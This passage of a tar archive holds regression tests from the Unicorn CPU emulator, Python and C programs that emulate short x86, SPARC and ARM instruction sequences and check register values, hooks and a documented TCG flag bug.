} uc_close(uc); return 0; } ����������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/run_across_bb.py��������������������������������������������������������0000775�0000000�0000000�00000017407�14675241067�0021227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # # This test demonstrates emulation behavior within and across # basic blocks. from __future__ import print_function import binascii import regress import struct from unicorn import * from unicorn.x86_const import * CODE = binascii.unhexlify(b"".join([ b"b800000000", # 1000: b8 00 00 00 00 mov eax,0x0 b"40", # 1005: 40 inc eax b"40", # 1006: 40 inc eax b"6810100000", # 1007: 68 10 10 00 00 push 0x1010 b"c3", # 100c: c3 ret b"cc", # 100d: cc int3 b"cc", # 100e: cc int3 b"cc", # 100f: cc int3 b"b800000000", # 1010: b8 00 00 00 00 mov eax,0x0 b"40", # 1015: 40 inc eax b"40", # 1016: 40 inc eax ])) def showpc(mu): pc = mu.reg_read(UC_X86_REG_EIP) print("pc: 0x%x" % (pc)) class RunAcrossBBTest(regress.RegressTest): def test_run_all(self): try: ####################################################################### # emu SETUP ####################################################################### print("\n---- test: run_all ----") mu = Uc(UC_ARCH_X86, UC_MODE_32) def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) mu.hook_add(UC_HOOK_CODE, hook_code) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) # stack mu.mem_map(0x2000, 0x1000) mu.reg_write(UC_X86_REG_EIP, 0x1000) mu.reg_write(UC_X86_REG_ESP, 0x2800) self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") showpc(mu) mu.emu_start(0x1000, 0x1016) # should exec the following four instructions: # 1000: b8 00 00 00 00 mov eax,0x0 < # 1005: 40 inc eax < # 1006: 40 inc eax < # 1007: 68 10 10 00 00 push 0x1010 < # 100c: c3 ret -----------+ # 100d: cc int3 | # 100e: cc int3 | # 100f: cc int3 | # 1010: b8 00 00 00 00 mov eax,0x0 <-+ # 1015: 40 inc eax < # 1016: 40 inc eax < self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") showpc(mu) except UcError as e: if e.errno == UC_ERR_FETCH_UNMAPPED: # during initial test dev, bad fetch at 0x1010, but the data is there, # and this proves it print("!!! about to bail due to bad fetch... here's the data at PC:") print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) def test_run_across_bb(self): try: ####################################################################### # emu SETUP ####################################################################### print("\n---- test: run_across_bb ----") mu = Uc(UC_ARCH_X86, UC_MODE_32) def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) mu.hook_add(UC_HOOK_CODE, hook_code) # base of CODE mu.mem_map(0x1000, 0x1000) mu.mem_write(0x1000, CODE) # stack mu.mem_map(0x2000, 0x1000) mu.reg_write(UC_X86_REG_EIP, 0x1000) mu.reg_write(UC_X86_REG_ESP, 0x2800) self.assertEqual(0x1000, mu.reg_read(UC_X86_REG_EIP), "unexpected PC") self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP") showpc(mu) ####################################################################### # emu_run ONE: # exectue four instructions, until the last instruction in a BB ####################################################################### mu.emu_start(0x1000, 0x100c) # should exec the following four instructions: # 1000: b8 00 00 00 00 mov eax,0x0 < # 1005: 40 inc eax < # 1006: 40 inc eax < # 1007: 68 10 10 00 00 push 0x1010 < # should be at 0x100c, as requested self.assertEqual(0x100c, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (2)") # single push, so stack diff is 0x4 TOP_OF_STACK = 0x2800-0x4 self.assertEqual(TOP_OF_STACK, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (2)") # top of stack should be 0x1010 self.assertEqual(0x1010, struct.unpack("<I", mu.mem_read(TOP_OF_STACK, 0x4))[0], "unexpected stack value") showpc(mu) ####################################################################### # emu_run TWO # execute one instruction that jumps to a new BB ####################################################################### mu.emu_start(0x100c, 0x1010) # should exec one instruction that jumps to 0x1010: # 100c: c3 ret -----------+ # 100d: cc int3 | # 100e: cc int3 | # 100f: cc int3 | # 1010: b8 00 00 00 00 mov eax,0x0 <-+ # should be at 0x1010, as requested self.assertEqual(0x1010, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (3)") # single pop, so stack back at base self.assertEqual(0x2800, mu.reg_read(UC_X86_REG_ESP), "unexpected SP (3)") showpc(mu) ####################################################################### # emu_run THREE # execute three instructions to verify things work as expected ####################################################################### mu.emu_start(0x1010, 0x1016) # should exec the following three instructions: # 1010: b8 00 00 00 00 mov eax,0x0 < # 1015: 40 inc eax < # 1016: 40 inc eax < self.assertEqual(0x1016, mu.reg_read(UC_X86_REG_EIP), "unexpected PC (4): 0x%x vs 0x%x" % ( 0x1016, mu.reg_read(UC_X86_REG_EIP))) showpc(mu) except UcError as e: if e.errno == UC_ERR_FETCH_UNMAPPED: # during initial test dev, bad fetch at 0x1010, but the data is there, # and this proves it print("!!! about to bail due to bad fetch... here's the data at PC:") print(binascii.hexlify(mu.mem_read(mu.reg_read(UC_X86_REG_EIP), 0x8))) self.assertFalse(True, "ERROR: %s @ 0x%x" % (e, mu.reg_read(UC_X86_REG_EIP))) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rw_hookstack.c����������������������������������������������������������0000664�0000000�0000000�00000005264�14675241067�0020671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <unicorn/unicorn.h> #define ADDRESS 0x1000000 #define STACK 0x0020D000 #define STACK2 0x0030D000 #define STACK_SIZE 16384 #define SIZE (2 * 1024 * 1024) #define CODE32 "\x8B\x04\x24\xA3\x40\x00\x00\x01\xA1\x40\x00\x00\x01" bool hook_mem_rw(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { unsigned int EIP; uc_reg_read(uc, UC_X86_REG_EIP, &EIP); switch(type) { default: return false; break; case UC_MEM_WRITE: printf("Hooked write to address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); return true; break; case UC_MEM_READ: printf("Hooked read from address 0x%08"PRIX64" with value 0x%08"PRIX64" at EIP %08X\n", address, value, EIP); return true; break; } } int main(int argc, char *argv[]) { uc_engine *uc; uc_hook trace; uc_err err; unsigned int EAX, ESP, val = 0x0c0c0c0c, stkval = STACK; EAX = 0; ESP = STACK+0x4; // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return 1; } err = uc_mem_map(uc, ADDRESS, SIZE, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return 1; } err = uc_mem_write(uc, ADDRESS, CODE32, sizeof(CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write to memory %s\n", uc_strerror(err)); return 1; } loop: err = uc_mem_map(uc, stkval, STACK_SIZE, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return 1; } err = uc_mem_write(uc, ESP, &val, sizeof(val)); if(err != UC_ERR_OK) { printf("Failed to write to memory %s\n", uc_strerror(err)); return 1; } uc_hook_add(uc, &trace, UC_HOOK_MEM_WRITE | UC_HOOK_MEM_READ, (void *)hook_mem_rw, NULL, 1, 0); uc_reg_write(uc, UC_X86_REG_EAX, &EAX); uc_reg_write(uc, UC_X86_REG_ESP, &ESP); err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return 1; } uc_reg_read(uc, UC_X86_REG_EAX, &EAX); printf(">>> EAX = %08X\n", EAX); if(stkval != STACK2) { printf("=== Beginning test two ===\n"); ESP = STACK2+0x4; EAX = 0; stkval = STACK2; goto loop; } uc_close(uc); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/segfault_on_stop.py�����������������������������������������������������0000775�0000000�0000000�00000000472�14675241067�0021753�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import regress import unicorn class SegfaultOnStop(regress.RegressTest): def test(self): unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_64).emu_stop() self.assertTrue(True, "If not reached, then we have a crashing bug.") if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sigill.c����������������������������������������������������������������0000664�0000000�0000000�00000002276�14675241067�0017456�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define UC_BUG_WRITE_SIZE 128 #define UC_BUG_WRITE_ADDR 0x1000 // fix this by change this to 0x2000 int got_sigill = 0; void _interrupt(uc_engine *uc, uint32_t intno, void *user_data) { if (intno == 6) { uc_emu_stop(uc); got_sigill = 1; } } int main(void) { int size; uint8_t *buf; uc_engine *uc; uc_hook uh_trap; uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { fprintf (stderr, "Cannot initialize unicorn\n"); return 1; } size = UC_BUG_WRITE_SIZE; buf = malloc (size); if (!buf) { fprintf (stderr, "Cannot allocate\n"); return 1; } memset (buf, 0, size); if (!uc_mem_map(uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { uc_mem_write(uc, UC_BUG_WRITE_ADDR, (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); } uc_hook_add(uc, &uh_trap, UC_HOOK_INTR, _interrupt, NULL, 1, 0); uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); uc_close(uc); free(buf); printf ("Correct: %s\n", got_sigill? "YES": "NO"); return got_sigill? 0: 1; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sigill2.c���������������������������������������������������������������0000664�0000000�0000000�00000001356�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define UC_BUG_WRITE_SIZE 128 #define UC_BUG_WRITE_ADDR 0x2000 int main(void) { int size; uc_engine *uc; uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); if (err) { fprintf (stderr, "Cannot initialize unicorn\n"); return 1; } size = UC_BUG_WRITE_SIZE; if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { uc_mem_write (uc, UC_BUG_WRITE_ADDR, (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); } err = uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); uc_close(uc); printf ("Error = %u (%s)\n", err, uc_strerror(err)); return err? -1: 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc64.py��������������������������������������������������������������0000775�0000000�0000000�00000001057�14675241067�0017662�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.sparc_const import * PAGE_SIZE = 1 * 1024 * 1024 uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) uc.reg_write(UC_SPARC_REG_SP, 100) print 'writing sp = 100' # 0: b0 06 20 01 inc %i0 # 4: b2 06 60 01 inc %i1 CODE = "\xb0\x06\x20\x01" \ "\xb2\x06\x60\x01" uc.mem_map(0, PAGE_SIZE) uc.mem_write(0, CODE) uc.emu_start(0, len(CODE), 0, 2) print 'sp =', uc.reg_read(UC_SPARC_REG_SP) print 'i0 =', uc.reg_read(UC_SPARC_REG_I0) print 'i1 =', uc.reg_read(UC_SPARC_REG_I1) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc_jump_to_zero.c����������������������������������������������������0000664�0000000�0000000�00000001540�14675241067�0022070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_SPARC #define HARDWARE_MODE UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN #define MEMORY_STARTING_ADDRESS 0x1000000 #define MEMORY_SIZE 2 * 1024 * 1024 #define MEMORY_PERMISSIONS UC_PROT_ALL #define BINARY_CODE "\x02\xbc\x00\x00" int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); printf("done\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sparc_reg.py������������������������������������������������������������0000775�0000000�0000000�00000015213�14675241067�0020344�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.sparc_const import * PAGE_SIZE = 1 * 1024 * 1024 uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) uc.reg_write(UC_SPARC_REG_SP, 100) uc.reg_write(UC_SPARC_REG_FP, 200) # 0x0: \x80\x00\x20\x01 add %g0, 1, %g0 # 0x4: \x82\x00\x60\x01 add %g1, 1, %g1 # 0x8: \x84\x00\xA0\x01 add %g2, 1, %g2 # 0xc: \x86\x00\xE0\x01 add %g3, 1, %g3 # 0x10: \x88\x01\x20\x01 add %g4, 1, %g4 # 0x14: \x8A\x01\x60\x01 add %g5, 1, %g5 # 0x18: \x8C\x01\xA0\x01 add %g6, 1, %g6 # 0x1c: \x8E\x01\xE0\x01 add %g7, 1, %g7 # 0x20: \x90\x02\x20\x01 add %o0, 1, %o0 # 0x24: \x92\x02\x60\x01 add %o1, 1, %o1 # 0x28: \x94\x02\xA0\x01 add %o2, 1, %o2 # 0x2c: \x96\x02\xE0\x01 add %o3, 1, %o3 # 0x30: \x98\x03\x20\x01 add %o4, 1, %o4 # 0x34: \x9A\x03\x60\x01 add %o5, 1, %o5 # 0x38: \x9C\x03\xA0\x01 add %sp, 1, %sp # 0x3c: \x9E\x03\xE0\x01 add %o7, 1, %o7 # 0x40: \xA0\x04\x20\x01 add %l0, 1, %l0 # 0x44: \xA2\x04\x60\x01 add %l1, 1, %l1 # 0x48: \xA4\x04\xA0\x01 add %l2, 1, %l2 # 0x4c: \xA6\x04\xE0\x01 add %l3, 1, %l3 # 0x50: \xA8\x05\x20\x01 add %l4, 1, %l4 # 0x54: \xAA\x05\x60\x01 add %l5, 1, %l5 # 0x58: \xAC\x05\xA0\x01 add %l6, 1, %l6 # 0x5c: \xAE\x05\xE0\x01 add %l7, 1, %l7 # 0x0: \xB0\x06\x20\x01 add %i0, 1, %i0 # 0x4: \xB2\x06\x60\x01 add %i1, 1, %i1 # 0x8: \xB4\x06\xA0\x01 add %i2, 1, %i2 # 0xc: \xB6\x06\xE0\x01 add %i3, 1, %i3 # 0x10: \xB8\x07\x20\x01 add %i4, 1, %i4 # 0x14: \xBA\x07\x60\x01 add %i5, 1, %i5 # 0x18: \xBC\x07\xA0\x01 add %fp, 1, %fp # 0x1c: \xBE\x07\xE0\x01 add %i7, 1, %i7 CODE = "\x80\x00\x20\x01" \ "\x82\x00\x60\x01" \ "\x84\x00\xA0\x01" \ "\x86\x00\xE0\x01" \ "\x88\x01\x20\x01" \ "\x8A\x01\x60\x01" \ "\x8C\x01\xA0\x01" \ "\x8E\x01\xE0\x01" \ "\x90\x02\x20\x01" \ "\x92\x02\x60\x01" \ "\x94\x02\xA0\x01" \ "\x96\x02\xE0\x01" \ "\x98\x03\x20\x01" \ "\x9A\x03\x60\x01" \ "\x9C\x03\xA0\x01" \ "\x9E\x03\xE0\x01" \ "\xA0\x04\x20\x01" \ "\xA2\x04\x60\x01" \ "\xA4\x04\xA0\x01" \ "\xA6\x04\xE0\x01" \ "\xA8\x05\x20\x01" \ "\xAA\x05\x60\x01" \ "\xAC\x05\xA0\x01" \ "\xAE\x05\xE0\x01" \ "\xB0\x06\x20\x01" \ "\xB2\x06\x60\x01" \ "\xB4\x06\xA0\x01" \ "\xB6\x06\xE0\x01" \ "\xB8\x07\x20\x01" \ "\xBA\x07\x60\x01" \ "\xBC\x07\xA0\x01" \ "\xBE\x07\xE0\x01" uc.mem_map(0, PAGE_SIZE) uc.mem_write(0, CODE) uc.emu_start(0, len(CODE), 0, 32) def print_registers(mu): g0 = mu.reg_read(UC_SPARC_REG_G0) g1 = mu.reg_read(UC_SPARC_REG_G1) g2 = mu.reg_read(UC_SPARC_REG_G2) g3 = mu.reg_read(UC_SPARC_REG_G3) g4 = mu.reg_read(UC_SPARC_REG_G4) g5 = mu.reg_read(UC_SPARC_REG_G5) g6 = mu.reg_read(UC_SPARC_REG_G6) g7 = mu.reg_read(UC_SPARC_REG_G7) o0 = mu.reg_read(UC_SPARC_REG_O0) o1 = mu.reg_read(UC_SPARC_REG_O1) o2 = mu.reg_read(UC_SPARC_REG_O2) o3 = mu.reg_read(UC_SPARC_REG_O3) o4 = mu.reg_read(UC_SPARC_REG_O4) o5 = mu.reg_read(UC_SPARC_REG_O5) o6 = mu.reg_read(UC_SPARC_REG_O6) o7 = mu.reg_read(UC_SPARC_REG_O7) l0 = mu.reg_read(UC_SPARC_REG_L0) l1 = mu.reg_read(UC_SPARC_REG_L1) l2 = mu.reg_read(UC_SPARC_REG_L2) l3 = mu.reg_read(UC_SPARC_REG_L3) l4 = mu.reg_read(UC_SPARC_REG_L4) l5 = mu.reg_read(UC_SPARC_REG_L5) l6 = mu.reg_read(UC_SPARC_REG_L6) l7 = mu.reg_read(UC_SPARC_REG_L7) i0 = mu.reg_read(UC_SPARC_REG_I0) i1 = mu.reg_read(UC_SPARC_REG_I1) i2 = mu.reg_read(UC_SPARC_REG_I2) i3 = mu.reg_read(UC_SPARC_REG_I3) i4 = mu.reg_read(UC_SPARC_REG_I4) i5 = mu.reg_read(UC_SPARC_REG_I5) i6 = mu.reg_read(UC_SPARC_REG_I6) i7 = mu.reg_read(UC_SPARC_REG_I7) pc = mu.reg_read(UC_SPARC_REG_PC) sp = mu.reg_read(UC_SPARC_REG_SP) fp = mu.reg_read(UC_SPARC_REG_FP) print(" G0 = %d" % g0) print(" G1 = %d" % g1) print(" G2 = %d" % g2) print(" G3 = %d" % g3) print(" G4 = %d" % g4) print(" G5 = %d" % g5) print(" G6 = %d" % g6) print(" G7 = %d" % g7) print("") print(" O0 = %d" % o0) print(" O1 = %d" % o1) print(" O2 = %d" % o2) print(" O3 = %d" % o3) print(" O4 = %d" % o4) print(" O5 = %d" % o5) print(" O6 = %d" % o6) print(" O7 = %d" % o7) print("") print(" L0 = %d" % l0) print(" L1 = %d" % l1) print(" L2 = %d" % l2) print(" L3 = %d" % l3) print(" L4 = %d" % l4) print(" L5 = %d" % l5) print(" L6 = %d" % l6) print(" L7 = %d" % l7) print("") print(" I0 = %d" % i0) print(" I1 = %d" % i1) print(" I2 = %d" % i2) print(" I3 = %d" % i3) print(" I4 = %d" % i4) print(" I5 = %d" % i5) print(" I6 = %d" % i6) print(" I7 = %d" % i7) print("") print(" PC = %d" % pc) print(" SP = %d" % sp) print(" FP = %d" % fp) print("") print_registers(uc) assert uc.reg_read(UC_SPARC_REG_PC) == 132 # make sure we executed all instructions assert uc.reg_read(UC_SPARC_REG_SP) == 101 assert uc.reg_read(UC_SPARC_REG_FP) == 201 assert uc.reg_read(UC_SPARC_REG_G0) == 0 # G0 is always zero assert uc.reg_read(UC_SPARC_REG_G1) == 1 assert uc.reg_read(UC_SPARC_REG_G2) == 1 assert uc.reg_read(UC_SPARC_REG_G3) == 1 assert uc.reg_read(UC_SPARC_REG_G4) == 1 assert uc.reg_read(UC_SPARC_REG_G5) == 1 assert uc.reg_read(UC_SPARC_REG_G6) == 1 assert uc.reg_read(UC_SPARC_REG_G7) == 1 assert uc.reg_read(UC_SPARC_REG_O0) == 1 assert uc.reg_read(UC_SPARC_REG_O1) == 1 assert uc.reg_read(UC_SPARC_REG_O2) == 1 assert uc.reg_read(UC_SPARC_REG_O3) == 1 assert uc.reg_read(UC_SPARC_REG_O4) == 1 assert uc.reg_read(UC_SPARC_REG_O5) == 1 assert uc.reg_read(UC_SPARC_REG_O6) == 101 assert uc.reg_read(UC_SPARC_REG_O7) == 1 assert uc.reg_read(UC_SPARC_REG_L0) == 1 assert uc.reg_read(UC_SPARC_REG_L1) == 1 assert uc.reg_read(UC_SPARC_REG_L2) == 1 assert uc.reg_read(UC_SPARC_REG_L3) == 1 assert uc.reg_read(UC_SPARC_REG_L4) == 1 assert uc.reg_read(UC_SPARC_REG_L5) == 1 assert uc.reg_read(UC_SPARC_REG_L6) == 1 assert uc.reg_read(UC_SPARC_REG_L7) == 1 assert uc.reg_read(UC_SPARC_REG_I0) == 1 assert uc.reg_read(UC_SPARC_REG_I1) == 1 assert uc.reg_read(UC_SPARC_REG_I2) == 1 assert uc.reg_read(UC_SPARC_REG_I3) == 1 assert uc.reg_read(UC_SPARC_REG_I4) == 1 assert uc.reg_read(UC_SPARC_REG_I5) == 1 assert uc.reg_read(UC_SPARC_REG_I6) == 201 assert uc.reg_read(UC_SPARC_REG_I7) == 1 �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/sysenter_hook_x86.c�����������������������������������������������������0000664�0000000�0000000�00000003000�14675241067�0021556�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // code to be emulated #define X86_CODE32 "\x0F\x34" // SYSENTER // memory address where emulation starts #define ADDRESS 0x1000000 int got_sysenter = 0; void sysenter (uc_engine *uc, void *user) { printf ("SYSENTER hook called.\n"); got_sysenter = 1; } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; uc_hook sysenterHook; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); return -1; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return -1; } // Hook the SYSENTER instructions if (uc_hook_add (uc, &sysenterHook, UC_HOOK_INSN, sysenter, NULL, 1, 0, UC_X86_INS_SYSENTER) != UC_ERR_OK) { printf ("Cannot hook SYSENTER instruction\n."); return -1; } // emulate code in infinite time & unlimited instructions err=uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf("Emulation done.\n"); uc_close(uc); if (!got_sysenter) { printf ("[!] ERROR : SYSENTER hook not called.\n"); return -1; } return 0; } unicorn-2.1.1/tests/regress/tcg_liveness_analysis_bug_issue-287.py����������������������������������0000775�0000000�0000000�00000014571�14675241067�0025360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.arm_const import * import binascii MB = 1024 * 1024 PAGE = 4 * 1024 def PrintArmRegisters(uc_emu): print 'R0 : '+hex(uc_emu.reg_read(UC_ARM_REG_R0)) print 'R1 : '+hex(uc_emu.reg_read(UC_ARM_REG_R1)) print 'R2 : '+hex(uc_emu.reg_read(UC_ARM_REG_R2)) print 'R3 : '+hex(uc_emu.reg_read(UC_ARM_REG_R3)) print 'R4 : '+hex(uc_emu.reg_read(UC_ARM_REG_R4)) print 'R5 : '+hex(uc_emu.reg_read(UC_ARM_REG_R5)) print 'R6 : '+hex(uc_emu.reg_read(UC_ARM_REG_R6)) print 'R7 : '+hex(uc_emu.reg_read(UC_ARM_REG_R7)) print 'R8 : '+hex(uc_emu.reg_read(UC_ARM_REG_R8)) print 'R9 : '+hex(uc_emu.reg_read(UC_ARM_REG_R9)) print 'R10 : '+hex(uc_emu.reg_read(UC_ARM_REG_R10)) print 'R11 : '+hex(uc_emu.reg_read(UC_ARM_REG_R11)) print 'R12 : '+hex(uc_emu.reg_read(UC_ARM_REG_R12)) print 'SP : '+hex(uc_emu.reg_read(UC_ARM_REG_SP)) print 'LR : '+hex(uc_emu.reg_read(UC_ARM_REG_LR)) print 'PC : '+hex(uc_emu.reg_read(UC_ARM_REG_PC)) flags = uc_emu.reg_read(UC_ARM_REG_CPSR) print 'carry : '+str(flags >> 29 & 0x1) print 'overflow : '+str(flags >> 28 & 0x1) print 'negative : '+str(flags >> 31 & 0x1) print 'zero : '+str(flags >> 30 & 0x1) ''' issue #287 Initial Register States: R0=3, R1=24, R2=16, R3=0 ----- code start ----- CMP R0,R1,LSR#3 SUBCS R0,R0,R1,LSR#3 # CPU flags got changed in these two instructions, and *REMEMBERED*, now NF == VF == 0 CMP R0,#1 # CPU flags changed again, now NF == 1, VF == 0, but they are not properly *REMEMBERED* MOV R1,R1,LSR#4 SUBGES R2,R2,#4 # according to the result of CMP, we should skip this op MOVGE R3,#100 # since changed flags are not *REMEMBERED* in CMP, now NF == VF == 0, which result in wrong branch # at the end of this code block, should R3 == 0 ----- code end ------ # TCG ops are correct, plain op translation is done correctly, # but there're In-Memory bits invisible from ops that control the host code generation. # all these codes are in one TCG translation-block, so wrong things could happen. # detail explanation is given on the right side. # remember, both set_label and brcond are point to refresh the dead_temps and mem_temps states in TCG ----- TCG ops ------ ld_i32 tmp5,env,$0xfffffffffffffff4 movi_i32 tmp6,$0x0 brcond_i32 tmp5,tmp6,ne,$0x0 mov_i32 tmp5,r1 ------------------------- movi_i32 tmp6,$0x3 | shr_i32 tmp5,r1,tmp6 | mov_i32 tmp6,r0 | sub_i32 NF,r0,tmp5 | mov_i32 ZF,NF | setcond_i32 CF,r0,tmp5,geu | # This part is "CMP R0,R1,LSR#3" xor_i32 VF,NF,r0 |-----> # and "SUBCS R0,R0,R1,LSR#3" xor_i32 tmp7,r0,tmp5 | # the last op in this block, set_label get a chance to refresh the TCG globals memory states, and_i32 VF,VF,tmp7 | # so things get back to normal states mov_i32 tmp6,NF | # these codes are not affected by the bug. Let's called this Part-D movi_i32 tmp5,$0x0 | brcond_i32 CF,tmp5,eq,$0x1 | mov_i32 tmp5,r1 | movi_i32 tmp6,$0x3 | shr_i32 tmp5,r1,tmp6 | mov_i32 tmp6,r0 | sub_i32 tmp6,r0,tmp5 | mov_i32 r0,tmp6 | set_label $0x1 ------------------------- movi_i32 tmp5,$0x1 ----------------- # Let's called this Part-C mov_i32 tmp6,r0 | # NF is used as output operand again! sub_i32 NF,r0,tmp5 ----------------|-----> # but it is stated as Not-In-Memory, mov_i32 ZF,NF | # no need to sync it after calculation. setcond_i32 CF,r0,tmp5,geu | # the generated host code does not write NF xor_i32 VF,NF,r0 | # back to its memory location, hence forgot. And the CPU flags after this calculation is not changed. xor_i32 tmp7,r0,tmp5 | # Caution: the following SUBGES's condition check is right, even though the generated host code does not *REMEMBER* NF, it will cache the calculated result and serve SUBGES correctly and_i32 VF,VF,tmp7 | mov_i32 tmp6,NF | mov_i32 tmp5,r1 | # this part is "CMP R0,#1" movi_i32 tmp6,$0x4 | # and "MOV R1,R1,LSR#4" shr_i32 tmp5,r1,tmp6 | # and "SUBGES R2,R2,#4" mov_i32 r1,tmp5 |-----> # This is the part where problem start to arise xor_i32 tmp5,VF,NF | movi_i32 tmp6,$0x0 | brcond_i32 tmp5,tmp6,lt,$0x2 --------|-----> # QEMU will refresh the InMemory bit for TCG globals here, but Unicorn won't movi_i32 tmp5,$0x4 | mov_i32 tmp6,r2 | # this is the 1st bug-related op get analyzed. sub_i32 NF,r2,tmp5 ----------------|-----> # 